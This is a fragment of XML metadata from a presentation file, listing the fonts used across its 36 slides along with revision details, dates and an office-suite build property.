  <Slides>36</Slides>
  <Notes>0</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36</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="57" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>华文细黑</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>方正书宋_GBK</vt:lpstr>
      <vt:lpstr>Segoe UI</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Arial Unicode MS</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Source Sans Pro</vt:lpstr>
      <vt:lpstr>Gill Sans</vt:lpstr>
      <vt:lpstr>Gill Sans MT</vt:lpstr>
      <vt:lpstr>华文仿宋</vt:lpstr>
      <vt:lpstr>华文中宋</vt:lpstr>
      <vt:lpstr>仿宋</vt:lpstr>
      <vt:lpstr>华文隶书</vt:lpstr>
      <vt:lpstr>华文彩云</vt:lpstr>
      <vt:lpstr>Malgun Gothic Semilight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barca8best</cp:lastModifiedBy>
  <cp:revision>105</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-02-21T09:02:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-21T14:18:40Z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A4FEFC61AE1A4754B36FE215C2F027BB_11</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="KSOProductBuildVer">
    <vt:lpwstr>2052-12.1.0.15374</vt:lpwstr>
  </property>
</Properties>
</file>